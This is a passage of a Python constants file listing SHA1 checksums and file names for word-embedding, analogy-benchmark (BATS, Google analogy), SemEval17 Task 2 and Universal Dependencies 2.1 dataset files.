'85f3186f26d6725317a64e290363a7251b928b81'),
'wiki.sm': ('wiki.sm.npz',
'9e13452cc4bff677f4f15db04f9d2f95f6ec054c'),
'wiki.sn': ('wiki.sn.npz',
'e8d5f7dcf51280c5f99bc3df849b4889a61e9fcd'),
'wiki.so': ('wiki.so.npz',
'0f5d71b95768b33fd939a870c15344c4478364a9'),
'wiki.sq': ('wiki.sq.npz',
'8b05826df8575e65c87a2fc0b7630cf644d4216d'),
'wiki.srn': ('wiki.srn.npz',
'2711396ef297ac5dde8904508bc002bdecbcc6f4'),
'wiki.sr': ('wiki.sr.npz',
'546edc8e29a5d2e99ed10eb4a552cbef2bb8f417'),
'wiki.ss': ('wiki.ss.npz',
'2e5911bad79bb5270a64f587e326d31c95ec58f3'),
'wiki.st': ('wiki.st.npz',
'23bc954719a2962e891f02efaea754c9ea025894'),
'wiki.stq': ('wiki.stq.npz',
'dd3ece0c0aa30e53ae0f4b558309bb60ab628652'),
'wiki.su': ('wiki.su.npz',
'7e48732e8a1fcf212e692924a4416a6ac3b3b055'),
'wiki.sv': ('wiki.sv.npz',
'b9ec52e9423688f195f3145c243226c0e0b51e83'),
'wiki.sw': ('wiki.sw.npz',
'5262f0c645322b10eca73f792a970f10b2719e55'),
'wiki.szl': ('wiki.szl.npz',
'fdd6d6b291cdbbcec5ff93451a588fdd103bb2d0'),
'wiki.ta': ('wiki.ta.npz',
'da7c5bc6e1142306ff2669bf1739832beb6c1763'),
'wiki.tcy': ('wiki.tcy.npz',
'baa49e1afa2bb0dcaaef0fac1ee75bbe711d1134'),
'wiki.te': ('wiki.te.npz',
'baf48767ce85e4d41d65d25f2bbf1c5f559ec18f'),
'wiki.tet': ('wiki.tet.npz',
'11e46a893af55344dbe102d530fdfea5d949d3bc'),
'wiki.tg': ('wiki.tg.npz',
'da66abb72ec9ccc602713161e544963d59cc51d7'),
'wiki.th': ('wiki.th.npz',
'25e54bf2d305779ec9baa5f344410bd75c7702fc'),
'wiki.ti': ('wiki.ti.npz',
'1faf98f3a0eafa7559a4b2a111f43dd1f7b9a05b'),
'wiki.tk': ('wiki.tk.npz',
'34c714fa8275fd6abfe86b2d144a043774552a6c'),
'wiki.tl': ('wiki.tl.npz',
'7d7f8a0485155bce7a74a1d778824375b0029f53'),
'wiki.tn': ('wiki.tn.npz',
'd0bc3a9b948753ac2283e5e10480c9fa0f6acb53'),
'wiki.to': ('wiki.to.npz',
'e982fc31bcfcf7339988d7aad21ce29ac9e84b0b'),
'wiki.tpi': ('wiki.tpi.npz',
'448cef043fa4b7f97825dbf8ee205ef05543bcac'),
'wiki.tr': ('wiki.tr.npz',
'c9830607a4c5134c6191006f1d80bae0ec798fe6'),
'wiki.ts': ('wiki.ts.npz',
'84a0598803712c8a713943447ddb73fc0f39af43'),
'wiki.tt': ('wiki.tt.npz',
'82c29df18f33e6284af3e977a6dda7e132a7a225'),
'wiki.tum': ('wiki.tum.npz',
'358990b894a3fb09d70674465952d828c9b0eda7'),
'wiki.tw': ('wiki.tw.npz',
'1e6d2838a4f271c1808795fb929cfcbf95094d93'),
'wiki.ty': ('wiki.ty.npz',
'e41ca5192d8cb515b3561c8d6935b150deb027b7'),
'wiki.tyv': ('wiki.tyv.npz',
'ce062ed32e854604714b65698ae290c99ba28060'),
'wiki.udm': ('wiki.udm.npz',
'9e1c5891ee0c5ac8f65fc457e1b42c7b2bfc8d37'),
'wiki.ug': ('wiki.ug.npz',
'656503e54063e200980e39f00fc011395bcd8551'),
'wiki.uk': ('wiki.uk.npz',
'352b7ee24d9fc6513fff4fe13bc04086c680834a'),
'wiki.ur': ('wiki.ur.npz',
'a81e55c7adfc2cef779ce9a01fe21319a7e4943b'),
'wiki.uz': ('wiki.uz.npz',
'd60d1e67bb8574dd71c18c88114aba674fc1eecb'),
'wiki.ve': ('wiki.ve.npz',
'5bfc3dbb3e47d23597df47ef12bd1c64ab8d3ea9'),
'wiki.vep': ('wiki.vep.npz',
'7a94355754fbe56802242c0bf9d7a27335095552'),
'wiki.vi': ('wiki.vi.npz',
'f118039eb16a4ca3347b6b171eac41113350a041'),
'wiki.vls': ('wiki.vls.npz',
'9a46a2fdc6448aa54f212081643745499ea7d05c'),
'wiki.vo': ('wiki.vo.npz',
'8e2f93c85ac608bcc4ae14093b9ff016061378fb'),
'wiki.wa': ('wiki.wa.npz',
'907074f7743d30cdbb2c48d0c8b4040796ea4164'),
'wiki.war': ('wiki.war.npz',
'928fb410c394b9c18d875326b6a3e750e2611e1b'),
'wiki.wo': ('wiki.wo.npz',
'7bb352be44f7261aa926f49b13e77df30f29312f'),
'wiki.wuu': ('wiki.wuu.npz',
'0d1dc7b05867ff2156a1180ad3da3b4697924e59'),
'wiki.xal': ('wiki.xal.npz',
'd87f4a131e086dc0bdc2a7e10406820c3c03b6a9'),
'wiki.xh': ('wiki.xh.npz',
'c64e1d2e77d1c744a628e2bd7353284616e48bea'),
'wiki.xmf': ('wiki.xmf.npz',
'160b9ee9773b9099aaf37ae9bdbc8a4a93b7f6ea'),
'wiki.yi': ('wiki.yi.npz',
'0662542cee29f3392fc905004ac6443b32c1477c'),
'wiki.yo': ('wiki.yo.npz',
'5d12d3b902a1fa19d8548295c3802c0608afa5c8'),
'wiki.za': ('wiki.za.npz',
'536348ff89df62e968739b567a1245bfd4112fbe'),
'wiki.zea': ('wiki.zea.npz',
'61fa192289a7c0f73ffa8035632a38b91c31c224'),
'wiki.zh_classical': ('wiki.zh_classical.npz',
'9acc9eaf8ebe316b945fb1f56ac71a2b7e024854'),
'wiki.zh_min_nan': ('wiki.zh_min_nan.npz',
'5d38bc025c82af578299d60f7df7b399de6ed81a'),
'wiki.zh': ('wiki.zh.npz',
'94007fcf3b105bf2c21b84a3a22bdb7946e74804'),
'wiki.zh_yue': ('wiki.zh_yue.npz',
'af6f0d94e6418d528d6cedd859e07e6e2fb416ab'),
'wiki.zu': ('wiki.zu.npz',
'fc9ce07d5d0c49a3c86cf1b26056ada58f9404ca')}
GOOGLEANALOGY_CATEGORIES = [
'capital-common-countries', 'capital-world', 'currency', 'city-in-state',
'family', 'gram1-adjective-to-adverb', 'gram2-opposite',
'gram3-comparative', 'gram4-superlative', 'gram5-present-participle',
'gram6-nationality-adjective', 'gram7-past-tense', 'gram8-plural',
'gram9-plural-verbs'
]
BATS_CHECKSUMS = \
{'BATS_3.0/1_Inflectional_morphology/I01 [noun - plural_reg].txt':
'cfcba2835edf81abf11b84defd2f4daa3ca0b0bf',
'BATS_3.0/1_Inflectional_morphology/I02 [noun - plural_irreg].txt':
'44dbc56432b79ff5ce2ef80b6840a8aa916524f9',
'BATS_3.0/1_Inflectional_morphology/I03 [adj - comparative].txt':
'dc530918e98b467b8102a7dab772a66d3db32a73',
'BATS_3.0/1_Inflectional_morphology/I04 [adj - superlative].txt':
'6c6fdfb6c733bc9b298d95013765163f42faf6fb',
'BATS_3.0/1_Inflectional_morphology/I05 [verb_inf - 3pSg].txt':
'39fa47ec7238ddb3f9818bc586f23f55b55418d8',
'BATS_3.0/1_Inflectional_morphology/I06 [verb_inf - Ving].txt':
'8fabeb9f5af6c3e7154a220b7034bbe5b900c36f',
'BATS_3.0/1_Inflectional_morphology/I07 [verb_inf - Ved].txt':
'aa04df95aa2edb436cbcc03c7b15bc492ece52d6',
'BATS_3.0/1_Inflectional_morphology/I08 [verb_Ving - 3pSg].txt':
'5f22d8121a5043ce76d3b6b53a49a7bb3fe33920',
'BATS_3.0/1_Inflectional_morphology/I09 [verb_Ving - Ved].txt':
'377777c1e793c638e72c010228156d01f916708e',
'BATS_3.0/1_Inflectional_morphology/I10 [verb_3pSg - Ved].txt':
'051c0c3c633e10900f827991dac14cf76da7f022',
'BATS_3.0/2_Derivational_morphology/D01 [noun+less_reg].txt':
'5d6839e9d34ee1e9fddb5bbf6516cf6420b85d8d',
'BATS_3.0/2_Derivational_morphology/D02 [un+adj_reg].txt':
'80b82227a0d5f7377f1e8cebe28c582bfeb1afb5',
'BATS_3.0/2_Derivational_morphology/D03 [adj+ly_reg].txt':
'223e120bd61b3116298a253f392654c15ad5a39a',
'BATS_3.0/2_Derivational_morphology/D04 [over+adj_reg].txt':
'a56f8685af489bcd09c36f864eba1657ce0a7c28',
'BATS_3.0/2_Derivational_morphology/D05 [adj+ness_reg].txt':
'5da99b1f1781ecfb4a1a7448c715abf07451917b',
'BATS_3.0/2_Derivational_morphology/D06 [re+verb_reg].txt':
'4c5e1796091fade503fbf0bfc2fae2c7f98b5dd2',
'BATS_3.0/2_Derivational_morphology/D07 [verb+able_reg].txt':
'a6218162bc257d98e875fc667c23edfac59e19fd',
'BATS_3.0/2_Derivational_morphology/D08 [verb+er_irreg].txt':
'9a4236c3bbc23903e101a42fb5ad6e15e552fadf',
'BATS_3.0/2_Derivational_morphology/D09 [verb+tion_irreg].txt':
'3ab0153926d5cf890cf08a4077da6d9946133874',
'BATS_3.0/2_Derivational_morphology/D10 [verb+ment_irreg].txt':
'2a012b87a9a60e128e064c5fe24b60f99e16ddce',
'BATS_3.0/3_Encyclopedic_semantics/E01 [country - capital].txt':
'9890315d3c4e6a38b8ae5fc441858564be3d3dc4',
'BATS_3.0/3_Encyclopedic_semantics/E02 [country - language].txt':
'ef08a00e8ff7802811ace8f00fabac41b5d03678',
'BATS_3.0/3_Encyclopedic_semantics/E03 [UK_city - county].txt':
'754957101c93a25b438785bd4458404cd9010259',
'BATS_3.0/3_Encyclopedic_semantics/E04 [name - nationality].txt':
'71a6562c34fb6154992a7c3e499375fcc3529c96',
'BATS_3.0/3_Encyclopedic_semantics/E05 [name - occupation].txt':
'a9a6f9f1af959aef83106f3dbd6bed16dfe9a3ea',
'BATS_3.0/3_Encyclopedic_semantics/E06 [animal - young].txt':
'12d5b51c7b76b9136eadc719abc8cf4806c67b73',
'BATS_3.0/3_Encyclopedic_semantics/E07 [animal - sound].txt':
'91991b007a35f45bd42bd7d0d465c6f8311df911',
'BATS_3.0/3_Encyclopedic_semantics/E08 [animal - shelter].txt':
'e5af11e216db392986ba0cbb597d861066c29adb',
'BATS_3.0/3_Encyclopedic_semantics/E09 [things - color].txt':
'd30b2eb2fc7a60f19afda7c54582e30f6fe28f51',
'BATS_3.0/3_Encyclopedic_semantics/E10 [male - female].txt':
'247a588671bc1da8f615e14076bd42573d24b4b3',
'BATS_3.0/4_Lexicographic_semantics/L01 [hypernyms - animals].txt':
'4b5c4dabe2c9c038fafee85d8d3958f1b1dec987',
'BATS_3.0/4_Lexicographic_semantics/L02 [hypernyms - misc].txt':
'83d5ecad78d9de28fd70347731c7ee5918ba43c9',
'BATS_3.0/4_Lexicographic_semantics/L03 [hyponyms - misc].txt':
'a8319856ae2f76b4d4c030ac7e899bb3a06a9a48',
'BATS_3.0/4_Lexicographic_semantics/L04 [meronyms - substance].txt':
'c081e1104e1b40725063f4b39d13d1ec12496bfd',
'BATS_3.0/4_Lexicographic_semantics/L05 [meronyms - member].txt':
'bcbf05f3be76cef990a74674a9999a0bb9790a07',
'BATS_3.0/4_Lexicographic_semantics/L06 [meronyms - part].txt':
'2f9bdcc74b881e1c54b391c9a6e7ea6243b3accc',
'BATS_3.0/4_Lexicographic_semantics/L07 [synonyms - intensity].txt':
'8fa287860b096bef004fe0f6557e4f686e3da81a',
'BATS_3.0/4_Lexicographic_semantics/L08 [synonyms - exact].txt':
'a17c591961bddefd97ae5df71f9d1559ce7900f4',
'BATS_3.0/4_Lexicographic_semantics/L09 [antonyms - gradable].txt':
'117fbb86504c192b33a5469f2f282e741d9c016d',
'BATS_3.0/4_Lexicographic_semantics/L10 [antonyms - binary].txt':
'3cde2f2c2a0606777b8d7d11d099f316416a7224'}
BATS_CATEGORIES = {
'I01': '[noun - plural_reg]',
'I02': '[noun - plural_irreg]',
'I03': '[adj - comparative]',
'I04': '[adj - superlative]',
'I05': '[verb_inf - 3pSg]',
'I06': '[verb_inf - Ving]',
'I07': '[verb_inf - Ved]',
'I08': '[verb_Ving - 3pSg]',
'I09': '[verb_Ving - Ved]',
'I10': '[verb_3pSg - Ved]',
'D01': '[noun+less_reg]',
'D02': '[un+adj_reg]',
'D03': '[adj+ly_reg]',
'D04': '[over+adj_reg]',
'D05': '[adj+ness_reg]',
'D06': '[re+verb_reg]',
'D07': '[verb+able_reg]',
'D08': '[verb+er_irreg]',
'D09': '[verb+tion_irreg]',
'D10': '[verb+ment_irreg]',
'E01': '[country - capital]',
'E02': '[country - language]',
'E03': '[UK_city - county]',
'E04': '[name - nationality]',
'E05': '[name - occupation]',
'E06': '[animal - young]',
'E07': '[animal - sound]',
'E08': '[animal - shelter]',
'E09': '[things - color]',
'E10': '[male - female]',
'L01': '[hypernyms - animals]',
'L02': '[hypernyms - misc]',
'L03': '[hyponyms - misc]',
'L04': '[meronyms - substance]',
'L05': '[meronyms - member]',
'L06': '[meronyms - part]',
'L07': '[synonyms - intensity]',
'L08': '[synonyms - exact]',
'L09': '[antonyms - gradable]',
'L10': '[antonyms - binary]'
}
SEMEVAL17_CHECKSUMS = \
{'SemEval17-Task2/README.txt':
'ad02d4c22fff8a39c9e89a92ba449ec78750af6b',
'SemEval17-Task2/task2-scorer.jar':
'145ef73ce955656d59e3b67b41f8152e8ee018d8',
'SemEval17-Task2/test/subtask1-monolingual/data/de.test.data.txt':
'6fc840f989d2274509549e472a68fb88dd2e149f',
'SemEval17-Task2/test/subtask1-monolingual/data/en.test.data.txt':
'05293fcbd80b2f4aad9b6518ce1a546ad8f61f33',
'SemEval17-Task2/test/subtask1-monolingual/data/es.test.data.txt':
'552904b5988f9951311290ca8fa0441dd4351d4b',
'SemEval17-Task2/test/subtask1-monolingual/data/fa.test.data.txt':
'29d5970feac5982961bd6ab621ba31f83d3bff77',
'SemEval17-Task2/test/subtask1-monolingual/data/it.test.data.txt':
'c95fe2be8fab37e9c70610117bdedc48a0a8e95c',
'SemEval17-Task2/test/subtask1-monolingual/keys/de.test.gold.txt':
'c51463460495a242cc726d41713c5e00b66fdd18',
'SemEval17-Task2/test/subtask1-monolingual/keys/en.test.gold.txt':
'2d2bb2ed41308cc60e7953cc9036f7dc89141b48',
'SemEval17-Task2/test/subtask1-monolingual/keys/es.test.gold.txt':
'a5842ff17fe3847d15414924826a8eb236018bcc',
'SemEval17-Task2/test/subtask1-monolingual/keys/fa.test.gold.txt':
'717bbe035d8ae2bad59416eb3dd4feb7238b97d4',
'SemEval17-Task2/test/subtask1-monolingual/keys/it.test.gold.txt':
'a342b950109c73afdc86a7829e17c1d8f7c482f0',
'SemEval17-Task2/test/subtask2-crosslingual/data/de-es.test.data.txt':
'ef92b1375762f68c700e050d214d3241ccde2319',
'SemEval17-Task2/test/subtask2-crosslingual/data/de-fa.test.data.txt':
'17aa103981f3193960309bb9b4cc151acaf8136c',
'SemEval17-Task2/test/subtask2-crosslingual/data/de-it.test.data.txt':
'eced15e8565689dd67605a82a782d19ee846222a',
'SemEval17-Task2/test/subtask2-crosslingual/data/en-de.test.data.txt':
'5cb69370a46385a7a3d37cdf2018744be77203a0',
'SemEval17-Task2/test/subtask2-crosslingual/data/en-es.test.data.txt':
'402f7fed52b60e915fb1be49f935395488cf7a7b',
'SemEval17-Task2/test/subtask2-crosslingual/data/en-fa.test.data.txt':
'9bdddbbde3da755f2a700bddfc3ed1cd9324ad48',
'SemEval17-Task2/test/subtask2-crosslingual/data/en-it.test.data.txt':
'd3b37aac79ca10311352309ef9b172f686ecbb80',
'SemEval17-Task2/test/subtask2-crosslingual/data/es-fa.test.data.txt':
'a2959aec346c26475a4a6ad4d950ee0545f2381e',
'SemEval17-Task2/test/subtask2-crosslingual/data/es-it.test.data.txt':
'ca627c30143d9f82a37a8776fabf2cee226dd35c',
'SemEval17-Task2/test/subtask2-crosslingual/data/it-fa.test.data.txt':
'a03d79a6ce7b798356b53b4e85dbe828247b97ef',
'SemEval17-Task2/test/subtask2-crosslingual/keys/de-es.test.gold.txt':
'7564130011d38daad582b83135010a2a58796df6',
'SemEval17-Task2/test/subtask2-crosslingual/keys/de-fa.test.gold.txt':
'c9e23c2e5e970e7f95550fbac3362d85b82cc569',
'SemEval17-Task2/test/subtask2-crosslingual/keys/de-it.test.gold.txt':
'b74cc2609b2bd2ceb5e076f504882a2e0a996a3c',
'SemEval17-Task2/test/subtask2-crosslingual/keys/en-de.test.gold.txt':
'428dfdad2a144642c13c24b845e6b7de6bf5f663',
'SemEval17-Task2/test/subtask2-crosslingual/keys/en-es.test.gold.txt':
'1dd7ab08a10552486299151cdd32ed19b56db682',
'SemEval17-Task2/test/subtask2-crosslingual/keys/en-fa.test.gold.txt':
'17451ac2165aa9b695dae9b1aba20eb8609fb400',
'SemEval17-Task2/test/subtask2-crosslingual/keys/en-it.test.gold.txt':
'5041c0b84a603ed85aa0a5cbe4b1c34f69a2fa7c',
'SemEval17-Task2/test/subtask2-crosslingual/keys/es-fa.test.gold.txt':
'8c09a219670dc32ab3864078bf0c28a287accabc',
'SemEval17-Task2/test/subtask2-crosslingual/keys/es-it.test.gold.txt':
'b1cdd13209354cc2fc2f4226c80aaa85558daf4a',
'SemEval17-Task2/test/subtask2-crosslingual/keys/it-fa.test.gold.txt':
'e0b560bb1d2db39ce45e841c8aad611734dc94f1',
'SemEval17-Task2/trial/subtask1-monolingual/data/de.trial.data.txt':
'dd071fd90f59bec8d271a447d86ee2e462941f52',
'SemEval17-Task2/trial/subtask1-monolingual/data/en.trial.data.txt':
'e8e5add0850b3dec07f102be26b8791a5e9bbbcf',
'SemEval17-Task2/trial/subtask1-monolingual/data/es.trial.data.txt':
'8956c78ff9ceae1d923a57816e55392c6a7dfc49',
'SemEval17-Task2/trial/subtask1-monolingual/data/fa.trial.data.txt':
'2f7c4247cde0d918b3508e90f6b49a1f5031c81b',
'SemEval17-Task2/trial/subtask1-monolingual/data/it.trial.data.txt':
'c11e0b5b55f94fc97c7b11fa455e71b071be879f',
'SemEval17-Task2/trial/subtask1-monolingual/keys/de.trial.gold.txt':
'ce5567b1accf3eb07da53229dfcb2a8a1dfac380',
'SemEval17-Task2/trial/subtask1-monolingual/keys/en.trial.gold.txt':
'693cb5928e807c79e39136dc0981dadca7832ae6',
'SemEval17-Task2/trial/subtask1-monolingual/keys/es.trial.gold.txt':
'8241ca66bf5ba55f77607e9bcfae8e34902715d8',
'SemEval17-Task2/trial/subtask1-monolingual/keys/fa.trial.gold.txt':
'd30701a93c8c5500b82ac2334ed8410f9a23864b',
'SemEval17-Task2/trial/subtask1-monolingual/keys/it.trial.gold.txt':
'bad225573e1216ba8b35429e9fa520a20e8ce031',
'SemEval17-Task2/trial/subtask1-monolingual/output/de.trial.sample.output.txt':
'f85cba9f6690d61736623c16e620826b09384aa5',
'SemEval17-Task2/trial/subtask1-monolingual/output/en.trial.sample.output.txt':
'f85cba9f6690d61736623c16e620826b09384aa5',
'SemEval17-Task2/trial/subtask1-monolingual/output/es.trial.sample.output.txt':
'f85cba9f6690d61736623c16e620826b09384aa5',
'SemEval17-Task2/trial/subtask1-monolingual/output/fa.trial.sample.output.txt':
'f85cba9f6690d61736623c16e620826b09384aa5',
'SemEval17-Task2/trial/subtask1-monolingual/output/it.trial.sample.output.txt':
'f85cba9f6690d61736623c16e620826b09384aa5',
'SemEval17-Task2/trial/subtask2-crosslingual/data/de-es.trial.data.txt':
'c27c8977d8d4434fdc3e59a7b0121d87e0a03237',
'SemEval17-Task2/trial/subtask2-crosslingual/data/de-fa.trial.data.txt':
'88a6f6dd1bba309f7cae7281405e37f442782983',
'SemEval17-Task2/trial/subtask2-crosslingual/data/de-it.trial.data.txt':
'ebdab0859f3b349fa0120fc8ab98be3394f0d73d',
'SemEval17-Task2/trial/subtask2-crosslingual/data/en-de.trial.data.txt':
'128d1a460fe9836b66f0fcdf59455b02edb9f258',
'SemEval17-Task2/trial/subtask2-crosslingual/data/en-es.trial.data.txt':
'508c5dde8ffcc32ee3009a0d020c7c96a338e1d1',
'SemEval17-Task2/trial/subtask2-crosslingual/data/en-fa.trial.data.txt':
'1a3640eb5facfe15b1e23a07183a2e62ed80c7d9',
'SemEval17-Task2/trial/subtask2-crosslingual/data/en-it.trial.data.txt':
'141c83d591b0292016583d9c23a2cc5514a006aa',
'SemEval17-Task2/trial/subtask2-crosslingual/data/es-fa.trial.data.txt':
'a0a548cd698c389ee80c34d6ec72abed5f1625e5',
'SemEval17-Task2/trial/subtask2-crosslingual/data/es-it.trial.data.txt':
'8d42bed8a43ff93d26ca95794758d9392ca707ed',
'SemEval17-Task2/trial/subtask2-crosslingual/data/it-fa.trial.data.txt':
'9c85223f1f734de61c28157df0ce417bb0537803',
'SemEval17-Task2/trial/subtask2-crosslingual/keys/de-es.trial.gold.txt':
'126c92b2fb3b8f2784dd4ae2a4c52b02a87a8196',
'SemEval17-Task2/trial/subtask2-crosslingual/keys/de-fa.trial.gold.txt':
'1db6201c2c8f19744c39dbde8bd4a803859d64c1',
'SemEval17-Task2/trial/subtask2-crosslingual/keys/de-it.trial.gold.txt':
'5300bf2ead163ff3981fb41ec5d0e291c287c9e0',
'SemEval17-Task2/trial/subtask2-crosslingual/keys/en-de.trial.gold.txt':
'd4f5205de929bb0c4020e1502a3f2204b5accd51',
'SemEval17-Task2/trial/subtask2-crosslingual/keys/en-es.trial.gold.txt':
'3237e11c3a0d9c0f5d583f8dc1d025b97a1f8bfe',
'SemEval17-Task2/trial/subtask2-crosslingual/keys/en-fa.trial.gold.txt':
'c14de7bf326907336a02d499c9b92ab229f3f4f8',
'SemEval17-Task2/trial/subtask2-crosslingual/keys/en-it.trial.gold.txt':
'3c0276c4b4e7a6d8a618bbe1ab0f30ad7b07929c',
'SemEval17-Task2/trial/subtask2-crosslingual/keys/es-fa.trial.gold.txt':
'359f69e9dfd6411a936baa3392b8f05c398a7707',
'SemEval17-Task2/trial/subtask2-crosslingual/keys/es-it.trial.gold.txt':
'44090607fabe5a26926a384e521ef1317f6f00d0',
'SemEval17-Task2/trial/subtask2-crosslingual/keys/it-fa.trial.gold.txt':
'97b09ffa11803023c2143fd4a4ac4bbc9775e645',
'SemEval17-Task2/trial/subtask2-crosslingual/output/de-es.trial.sample.output.txt':
'a0735361a692be357963959728dacef85ea08240',
'SemEval17-Task2/trial/subtask2-crosslingual/output/de-fa.trial.sample.output.txt':
'b71166d8615e921ee689cefc81419398d341167f',
'SemEval17-Task2/trial/subtask2-crosslingual/output/de-it.trial.sample.output.txt':
'b71166d8615e921ee689cefc81419398d341167f',
'SemEval17-Task2/trial/subtask2-crosslingual/output/en-de.trial.sample.output.txt':
'b71166d8615e921ee689cefc81419398d341167f',
'SemEval17-Task2/trial/subtask2-crosslingual/output/en-es.trial.sample.output.txt':
'b71166d8615e921ee689cefc81419398d341167f',
'SemEval17-Task2/trial/subtask2-crosslingual/output/en-fa.trial.sample.output.txt':
'a0735361a692be357963959728dacef85ea08240',
'SemEval17-Task2/trial/subtask2-crosslingual/output/en-it.trial.sample.output.txt':
'a0735361a692be357963959728dacef85ea08240',
'SemEval17-Task2/trial/subtask2-crosslingual/output/es-fa.trial.sample.output.txt':
'b71166d8615e921ee689cefc81419398d341167f',
'SemEval17-Task2/trial/subtask2-crosslingual/output/es-it.trial.sample.output.txt':
'b71166d8615e921ee689cefc81419398d341167f',
'SemEval17-Task2/trial/subtask2-crosslingual/output/it-fa.trial.sample.output.txt':
'a0735361a692be357963959728dacef85ea08240'}
UD21_DATA_FILE_SHA1 = \
{'af': {'dev': ('af-ud-dev.conllu',
'e37b104f4425ee00afc81779201816d5ac525194'),
'test': ('af-ud-test.conllu',
'd2bf02370d308ee957c04242bd0871db0e488389'),
'train': ('af-ud-train.conllu',
'a652c7b19c236063d3ea489947f83095893b699a')},
'grc_proiel': {'dev': ('grc_proiel-ud-dev.conllu',
'd199530c7e40ff0214e510957bb126af0dc12c1c'),
'test': ('grc_proiel-ud-test.conllu',
'bb7825ddeb18fc2d86638e4725f04563f3e08aab'),
'train': ('grc_proiel-ud-train.conllu',
'fe6c861299b033abe8c4ce2b6131cd74f87b96a7')},
'grc': {'dev': ('grc-ud-dev.conllu',
'debdfec0272cd558ccd29fe0ae2f13175dd20a33'),
'test': ('grc-ud-test.conllu',
'f19accf31db95e2c736d716d3438c09aa877eb07'),
'train': ('grc-ud-train.conllu',
'e98d3eabea67787c5d43a498f5a0fa4246f38104')},
'ar_nyuad': {'dev': ('ar_nyuad-ud-dev.conllu',
'b740de9bd68e68b30b9b313eb050d44e94470ca5'),
'test': ('ar_nyuad-ud-test.conllu',
'f5d5b8979b7fedd76235d4bae77e0b4a7b0a750a'),
'train': ('ar_nyuad-ud-train.conllu',
'd065f03958fd8782a7431b6778c6665ad09444a6')},
'ar_pud': {'test': ('ar_pud-ud-test.conllu',
'2161701e6726b6feb14733a312fba6160b9eb722')},
'ar': {'dev': ('ar-ud-dev.conllu',
'5f8964974d5ba5eb3504cdafb93c34c473c4177c'),
'test': ('ar-ud-test.conllu',
'58df161047f310cc3bb4d0e615ca33466e630bb9'),
'train': ('ar-ud-train.conllu',
'0a3d5cefa1fecd6a74f2016ee73ea7a7a02eb359')},
'eu': {'dev': ('eu-ud-dev.conllu',
'3ee15b5ed46ec93d7278c8cc0351d242417d553d'),
'test': ('eu-ud-test.conllu',
'aa68d6442ac6dc1abedc19c1b98c4a9944786188'),
'train': ('eu-ud-train.conllu',
'd56ec997916e38ee6ab1badd78c119e81e4797c9')},
'be': {'dev': ('be-ud-dev.conllu',
'015473e91cf8937c46e8b721f206415abac16a35'),
'test': ('be-ud-test.conllu',
'f009ea1885f54cfd77fca8a2c89133b2af8f9f5e'),
'train': ('be-ud-train.conllu',
'26b871e28d2f356a709f106b6e3e86b417ba74e7')},
'bg': {'dev': ('bg-ud-dev.conllu',
'0a2284b10547681eb65691eb2a9f0f1662e16e90'),
'test': ('bg-ud-test.conllu',
'75ea2a5e1d55bb57efecae6ec2b5ac3cc1b37e57'),
'train': ('bg-ud-train.conllu',
'd4b2fa267010c4486885c91f3af65ff66c8be94c')},
'bxr': {'sample': ('bxr-ud-sample.conllu',
'9239bdd251a60820c71111ec54de9e7d58a8579d'),
'test': ('bxr-ud-test.conllu',
'0a06e527454ae0b547153222f67eb5db94e528fd')},
'yue': {'test': ('yue-ud-test.conllu',
'd91477c65aa75cd45489cca13f7a122066972bdb')},
'ca': {'dev': ('ca-ud-dev.conllu',
'5737824f0afff0d07a43db331f102d62c6da2d96'),
'test': ('ca-ud-test.conllu',
'0e28bd2a3b982515c1158194ad52bcbbe741e170'),
'train': ('ca-ud-train.conllu',
'b5ff2392722d4a1df3bfc52fa5b8f2043b7aec0c')},
'zh_cfl': {'test': ('zh_cfl-ud-test.conllu',
'32fe45cd0e4e11ced95202971bce74acbc6a8c30')},
'zh_hk': {'test': ('zh_hk-ud-test.conllu',
'4c75fa5bbcdcb181447b4e037224d50feb2776fb')},
'zh_pud': {'test': ('zh_pud-ud-test.conllu',
'b3e448884b7b6229379f9723b97c6e9a6fedcb61')},
'zh': {'dev': ('zh-ud-dev.conllu',
'34d8253b35ad2245d59ddffa71b5689ef267b6b2'),
'test': ('zh-ud-test.conllu',
'0f00516097650c12262298dd0fbd1b17a6d2bfe2'),
'train': ('zh-ud-train.conllu',
'9444eec5f4561f289ad140e47e49013689512a65')},
'cop': {'dev': ('cop-ud-dev.conllu',
'863d1004df1a92df52515105f6fae6ff68539595'),
'test': ('cop-ud-test.conllu',
'd3b33566679f071d4ad622ad840cd98381835706'),
'train': ('cop-ud-train.conllu',
'33d0e5de5d6077f7c52a4cd90bce0047f3e9ff6f')},
'hr': {'dev': ('hr-ud-dev.conllu',
'8da2a419980807d2e91e09b6bf496e58d442b0ba'),
'test': ('hr-ud-test.conllu',
'49d673cba3d32d39d413e557276a45a0214ed83e'),
'train': ('hr-ud-train.conllu',
'e5cc686bb46c80c84c3ac60ed459e1f124c04c08')},
'cs_cac': {'dev': ('cs_cac-ud-dev.conllu',
'69dfed28c29146b41a3428f4715bde70a6aecf00'),
'test': ('cs_cac-ud-test.conllu',
'a994b33ebbde486c1818a9df460fb112055e95de'),
'train': ('cs_cac-ud-train.conllu',
'694f8559471dc481612606bf5df078daa094a84e')},
'cs_cltt': {'dev': ('cs_cltt-ud-dev.conllu',
'f35d5dbe57cd95760901ea29de4f493d5d2a44d4'),
'test': ('cs_cltt-ud-test.conllu',
'a8f6696785e658471f759bc736b738a105cba9a3'),
'train': ('cs_cltt-ud-train.conllu',
'ab97886066bfa462e5da03d25f802489292c0b56')},
'cs_fictree': {'dev': ('cs_fictree-ud-dev.conllu',
'dc67c07737a3a8bf2633068941f2d55f1500e192'),
'test': ('cs_fictree-ud-test.conllu',
'06becaedef1cfdb8e1b2dce3f0d3a3a607d178a4'),
'train': ('cs_fictree-ud-train.conllu',
'fe7dbe3a0e6ee73e19e788c43bbb8f8f47ae1645')},
'cs_pud': {'test': ('cs_pud-ud-test.conllu',
'9f205677041de694157ba2ef3e1eadb44d467f2f')},
'cs': {'dev': ('cs-ud-dev.conllu',
'd609e895b21b8710337e23a98b58ffd7b7a54bf1'),
'test': ('cs-ud-test.conllu',
'34091286a11b1ce2a9c8bcfa03fdd86fb0e13965'),
'train': ('cs-ud-train.conllu',
'd1f855798a29d433b580d01ade0d8d062cd58534')},
'da': {'dev': ('da-ud-dev.conllu',
'2c0c798c20a2efb30273172d388342a82bb0ce3c'),
'test': ('da-ud-test.conllu',
'85a95a8527f8773f1575ceaf0ab51f204b211047'),
'train': ('da-ud-train.conllu',
'b653c029a7ae5c106f865dcef949fb3fe2aa0420')},
'nl_lassysmall': {'dev': ('nl_lassysmall-ud-dev.conllu',
'2a169af74c2206c9073c3932b4a300492a314ee5'),
'test': ('nl_lassysmall-ud-test.conllu',
